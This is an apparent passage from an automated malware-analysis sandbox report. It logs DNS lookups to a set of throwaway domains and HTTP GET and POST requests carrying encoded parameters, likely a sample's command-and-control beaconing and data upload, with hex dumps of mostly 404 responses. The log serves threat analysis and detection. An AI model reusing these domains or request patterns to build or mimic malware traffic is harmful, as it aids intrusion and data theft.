              Source: global trafficHTTP traffic detected: GET /ctdy/?fVnx=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZL0slqAhO+jziob4VAcWGL05V4I5mluLEA+jVEoKfPxy0XA8CH1k=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adadev.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH0APXdXeLgJf/YH3s7SsSxcTFbV5TCLi5mGdkJSFjaSfV97iwCLA=&XLc=1bXtqxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cifasnc.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: global trafficDNS traffic detected: DNS query: www.nosolofichas.online
              Source: global trafficDNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global trafficDNS traffic detected: DNS query: www.adadev.info
              Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 209Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 66 56 6e 78 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 64 66 4e 36 53 79 53 4c 66 43 35 54 61 31 39 71 51 64 58 7a 53 5a 56 52 4d 34 47 64 54 49 4e 72 54 49 2b 4f 52 48 6f 38 74 68 50 Data Ascii: fVnx=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvdfN6SySLfC5Ta19qQdXzSZVRM4GdTINrTI+ORHo8thP
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:43:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dhi5Anz1sVxRqsBBqutBVNpg9mX3RytAJhsAyyjo%2Bc7CSGg55RsL%2FXBSpzRtzOoLiDKz4guLreuWBjqI4P0y5OQC4440LrTw9OeUBgEtVm2Vo79tr7cz3CY40HDwVu01KqaW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bb11cdf4ac4e-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14150&min_rtt=14150&rtt_var=7075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:43:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2B%2BoaOmOxdREj376ijmXs9r%2Bbfzo9F2fUcb5eNdoG8a0ubCqm%2FlJyaE9Vb8dMtq9uOXo0jlf83Cx0le%2F16gBZ6Ld5I9ZxfkLp0lAbZWyDDP5Q8pjydtO5fPb5%2FmNCZr9iZnA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bb21beaaaa9e-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13897&min_rtt=13897&rtt_var=6948&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:44:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Buo9Afn0U76A6Zt8HZrnf1fFXDb6Rj6Suk5gPTQ4wPA8MRYQKEMfYfWA3dmrQtBCP%2BqzAaNPPwzvkQ5NKun4RBiIg91M95EGDc%2BvbEgD2uCDKNGAsCo5t6rifsiTT1iY2mL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bb316ec5c9bd-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7255&min_rtt=7255&rtt_var=3627&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:44:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNwb4mw1q2igSdj7r%2BFCdzBhts18GVvcpBQw5avA16vfJBHEkz5ZiRPIFWTnYO0oRF6kw%2FcaUwKLWqjYYHnu6kgogMxcFv%2FDPWhEuRcQrkDZCEfZELH9AYUh2f9eB78G0Zu7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bb417ee17117-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14051&min_rtt=14051&rtt_var=7025&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:44:08 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:44:11 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:44:14 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:44:16 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:44:22 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:44:24 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:44:27 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 